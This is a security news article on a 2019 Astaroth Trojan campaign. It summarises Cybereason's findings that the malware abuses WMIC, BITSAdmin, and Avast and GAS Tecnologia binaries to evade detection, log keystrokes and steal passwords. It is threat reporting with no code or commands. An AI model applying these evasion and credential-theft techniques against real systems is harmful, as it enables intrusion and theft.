Astaroth Trojan relies on legitimate os and antivirus processes to steal data

Pierluigi Paganini February 16, 2019

A new Astaroth Trojan campaign was spotted by the Cybereason’s Nocturnus team, hackers are targeting Brazil and European countries.

Researchers at Cybereason’s Nocturnus team have uncovered a new Astaroth Trojan campaign that is currently exploiting the Avast antivirus and security software developed by GAS Tecnologia to steal information and drop malicious modules.

“The campaign exploits legitimate operating system processes as well as security vendor products from companies like Avast and GAS Tecnologia to gain information about the target machine and steal password information, as well as keystate information and clipboard usage.” reads the analysis published by Cybereason.

The Astaroth Trojan was first spotted by security firm Cofense in late 2018 when it was involved in a campaign targeting Europe and Brazil. The malware abused living-off-the-land binaries (LOLbins) such as the command line interface of the Windows Management Instrumentation Console (WMIC) to download and install malicious payloads in the background. According to the experts, LOLbins are very effecting in evading antivirus software. 

The new stain analyzed by Cybereason leverages the BITSAdmin and the WMIC utilities to connect the command and control infrastructure and download malicious payload. 

The BITSAdmin is a command-line tool that you can use to create download or upload jobs and monitor their progress.

This Astaroth Trojan is distributed through spam campaigns, malicious messages use a .7zip file as an attachment or include a hyperlink that points to the archive.

The .7zip archive contains a .lnk file which will instantiate a wmic.exe process that will “initialize an XSL Script Processing attack.”

The malware uses the BITSAdmin to fetch a payload from another Command and Control server, this malicious code is obfuscated as images or files without extensions and contains various Astaroth modules.

Astaroth Trojan

The malware also injects a malicious module in the aswrundll.exe Avast Software Runtime Dynamic Link Library used by the Avast antivirus. This code is used to gather information about the compromised system and to load extra modules.

The choice of Avast is effective because the Avast engine is the most common antivirus in the world. Avast pointed out that this is neither injection nor a privilege escalation, attackers are using an Avast file to run a binary in a similar way that a DLL using Windows’ rundll32.exe can run. Avast had issued a detection for the malware and plan to implement changes to their environment to ensure the same process cannot be misused in this way the future.

The Astaroth Trojan sample analyzed by the experts also exploits the unins000.exe process of a security solution developed by GAS Tecnologia.

The malware is able to log the users’ keystrokes, collect information through hooking, access clipboard content, and monitoring the keystate.

The Astaroth Trojan also uses the NetPass free network password recovery tool to collect login passwords of remote computers on the LAN, passwords of mail accounts on an exchange server stored by Microsoft Outlook, and passwords of MSN Messenger and Windows Messenger accounts.

“Part of the difficulty identifying this attack is in how it evades detection. It is difficult to catch, even for security teams aware of the complications ensuring a secure system, as with our customer above.” concludes Cybereason.

“LOLbins are deceptive because their execution seems benign at first, or even sometimes safe, as with the malicious use of antivirus software. As the use of LOLbins becomes more commonplace, we suspect this complex method of attack will become more common as well. The potential for damage will grow as attackers will look to other more destructive payloads.”

[adrotate banner=”9″] [adrotate banner=”12″]

Pierluigi Paganini

(SecurityAffairs – Astaroth Trojan, hacking)

[adrotate banner=”5″] [adrotate banner=”13″]



you might also like

leave a comment